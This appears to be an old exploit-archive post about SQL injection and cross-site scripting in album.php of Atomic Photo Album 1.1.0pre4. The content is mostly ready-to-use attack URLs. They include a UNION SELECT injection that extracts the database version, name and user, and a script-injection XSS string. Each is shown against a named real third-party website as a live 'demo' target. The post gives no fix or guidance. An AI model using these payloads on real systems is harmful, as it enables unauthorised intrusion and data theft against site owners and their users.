Atomic Photo Album version 1.1.0pre4 suffers from SQL injection and cross site scripting vulnerabilities in album.php.
2fda03a7a013e5c38bc716073d9a9bad6bf7dfb2db8906d83343bdb3b3dd8295
[~]-----------------------------------------------------------------------
[~] Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote
Vulnerabilities
[~]
[~] http://atomicpa.sourceforge.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 25.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/album.php?apa_album_ID=1 UNION SELECT
concat_ws(0x3a,version(),database(),user())/*
[~]
[~] Demo :-
[~]
[~] http://www.rockimkuhcenter.de/new/fotos/album.php?apa_album_ID=1 UNION
SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~]---------------------------------------------------------------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~] Demo :-
[~]
[~] http://www.rockimkuhcenter.de/new/fotos/album.php?apa_album_ID=
>'><script>alert(1337)</script>.
[~]
[~]----------------------------------------------------------------------------------------------------------------------------